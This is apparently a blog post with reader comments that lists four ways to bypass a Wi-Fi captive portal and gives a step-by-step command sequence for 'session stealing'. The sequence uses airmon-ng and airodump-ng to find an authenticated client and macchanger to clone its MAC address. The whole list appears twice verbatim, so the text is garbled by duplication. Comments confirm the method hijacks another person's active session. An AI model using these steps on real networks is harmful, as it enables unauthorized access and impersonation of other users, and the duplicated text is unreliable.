1. Captive portal-
open authentication
mac filtering
no encryption
2. Four ways to do bypass the restriction of captive portal-
1. Session stealing
2. DNS tunneling
3. Ping tunneling
4. Evil-Twin method
Session Stealing method
1. Install Backtrack
2. Turn wifi card up - ifconfig wlan0 up
3. Turn wifi card into monitor mode- airmon-ng start wlan0
4. airodump-ng mon0
5. airodump-ng --bssid macaddress mon0
6. copy the mac address of active client associateed with that
7. mon0 interface down
8. wlan0 interface down
9. macchanger -m clientmacaddress wlan0
10. wlan0 interface up
11. wicd
12. wireless manager- connect the network
open authentication
mac filtering
no encryption
2. Four ways to do bypass the restriction of captive portal-
1. Session stealing
2. DNS tunneling
3. Ping tunneling
4. Evil-Twin method
Session Stealing method
1. Install Backtrack
2. Turn wifi card up - ifconfig wlan0 up
3. Turn wifi card into monitor mode- airmon-ng start wlan0
4. airodump-ng mon0
5. airodump-ng --bssid macaddress mon0
6. copy the mac address of active client associateed with that
7. mon0 interface down
8. wlan0 interface down
9. macchanger -m clientmacaddress wlan0
10. wlan0 interface up
11. wicd
12. wireless manager- connect the network
Good work with the session stealing, what that does is cloaking yourself as the computer that has been authenticated. But that only works when someone has authenticated, otherwise you won't have access.
ReplyDeleteYes, that will work only by stealing other's active session.
DeleteThis comment has been removed by the author.
DeleteThe u have another way???
Delete